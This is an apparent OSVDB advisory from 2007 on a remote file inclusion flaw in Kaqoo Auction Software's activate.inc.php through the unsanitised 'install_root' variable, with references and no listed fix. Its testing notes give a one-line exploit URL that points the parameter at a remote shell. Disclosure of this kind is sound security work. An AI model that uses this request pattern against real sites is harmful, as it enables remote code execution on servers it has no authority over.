Kaqoo Auction Software Free Edition include/display/activate.inc.php install_root Variable Remote File Inclusion

2007-03-29T07:49:37
ID OSVDB:34570
Type osvdb
Reporter ThE dE@Th()
Modified 2007-03-29T07:49:37

Description

Vulnerability Description

Kaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/activate.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Kaqoo Auction Software (Free Edition) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the include/display/activate.inc.php script not properly sanitizing user input supplied to the 'install_root' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/include/display/activate.inc.php?install_root=[Shell]

References:

Vendor URL: http://kaqoo.com/ Secunia Advisory ID:24696 Other Advisory URL: http://milw0rm.com/exploits/3607 ISS X-Force ID: 33335 FrSIRT Advisory: ADV-2007-1180 CVE-2007-1790 Bugtraq ID: 23211